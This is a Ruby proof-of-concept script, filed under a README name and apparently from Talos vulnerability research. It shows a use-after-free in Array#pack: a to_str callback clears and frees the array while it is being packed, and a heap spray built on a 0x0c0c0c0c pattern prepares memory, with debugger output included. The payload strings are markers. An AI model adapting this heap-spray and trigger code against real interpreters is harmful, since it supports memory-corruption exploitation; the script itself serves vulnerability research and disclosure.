README.md
# Global array that holds the strings allocated by spray so they stay
# referenced between calls (100 slots; the loops in spray write indices 0..98).
$global_array = Array.new(100)
# 7FB07: string length needed to align blocks for a precise VA-block spray
# 0bec: offset for 0c0c0c0c
# previously the formula was: "A"*0x2a902+"D" => 0x2a903 final length
# Proof-of-concept heap-spray helper: builds one large pattern string and
# stores copies of it in $global_array. This is a research artifact for
# reproducing an interpreter memory-safety bug; it is only meaningful against
# an isolated test build of the affected interpreter.
#
# Each 0x10000-character unit is assembled as:
#   junk[0, 0xbec] + rop + shellcode + junk filler up to 0x10000 characters
# and the unit is then doubled until the string is at least 0x80000 long.
#
# NOTE(review): rop and shellcode are ASCII digit strings that act as
# recognisable marker text in a debugger; they are not binary payloads.
#
# Takes no arguments; the return value is whatever the last loop evaluates to
# and is not used by the caller in this file.
def spray
# Initial value is never read; final_payload is reassigned below.
final_payload = ""
offset = 0xbec
junk = "2020"
rop = "4141424243434444454546464747"
shellcode = "0c0c00c0c0c0c0c0c0c0c0c0c0c0"
# Double the 4-character filler until it is at least 0x10000 characters.
while junk.length < 0x10000
junk += junk;
end
# Filler prefix, then the two marker strings, then filler padding so the
# unit totals 0x10000 characters.
final_payload = junk[0,offset]
final_payload += rop
final_payload += shellcode
final_payload += junk[0,0x10000-offset-rop.length-shellcode.length]
# Repeat the unit by doubling until the string reaches 0x80000 characters.
while final_payload.length < 0x80000
final_payload += final_payload
end
# Three identical passes: each overwrites slots 0..98 with a new String built
# from the first 0x7fb00 characters, so the strings stored by the previous
# pass are no longer referenced from the array.
for i in 0...99 do
$global_array[i] = String.new(final_payload[0,0x7fb00])
end
for i in 0...99 do
$global_array[i] = String.new(final_payload[0,0x7fb00])
end
for i in 0...99 do
$global_array[i] = String.new(final_payload[0,0x7fb00])
end
end
=begin
0:000> dd 41414141
41414141 534f4c41 41414141 46414141 46464646
41414151 46464646 30334242 33303330 54303330
41414161 534f4c41 41414141 46414141 46464646
41414171 46464646 30334242 33303330 54303330
41414181 534f4c41 41414141 46414141 46464646
41414191 46464646 30334242 33303330 54303330
414141a1 534f4c41 41414141 46414141 46464646
414141b1 46464646 30334242 33303330 54303330
=end
# Calls spray 350 times with a 10-second pause after each call, so the code
# below this loop runs only after roughly 3500 seconds of sleeping.
for i in 0...350 do
spray
sleep 10
end
# Object whose implicit string conversion has side effects on the array that
# contains it. It is placed in $a at the end of the script, where
# $a.pack("AA") converts it through to_str while pack is still working on $a.
#
# NOTE(review): presumably the point is to show that pack keeps using array
# storage that user code released during the conversion; confirm against the
# advisory this PoC accompanies (the page names no version or identifier).
# The defensive expectation for an interpreter is to re-validate the array
# after any call back into user code.
class MyObject
# Empties $a and drops the global reference, forces a garbage-collection
# cycle, allocates large pattern strings, and returns "talos".
def to_str
# Mutate the array that is currently being packed, then release it.
$a.clear()
$a = nil
#63306330
# Pattern that begins with the ASCII text "TALOS", repeated 800 times.
x = "\x54\x41\x4C\x4F\x53\x0c\x0c\x0c\x0c\x41\x41\x41\x46\x46\x46\x46\x46\x46\x46\x46\x46\x42\x42\x33\x30\x30\x33\x30\x33\x30\x33\x30"*800
GC.start
# 99 allocations of x repeated 0x2100 times; each is assigned to the local
# a (not the global $a), so only the most recent one stays referenced.
for i in 0...99 do
a = String.new(x*(0x2100))
end
return "talos"
end
end
# Trigger: $a holds a MyObject followed by "."; pack("AA") needs a string for
# each element, which calls MyObject#to_str (and its side effects on $a)
# in the middle of the pack call.
$a = []
$a.push(MyObject.new())
$a.push(".")
puts $a.pack("AA")
#63f4a630
#s -a 0x0 L?8000000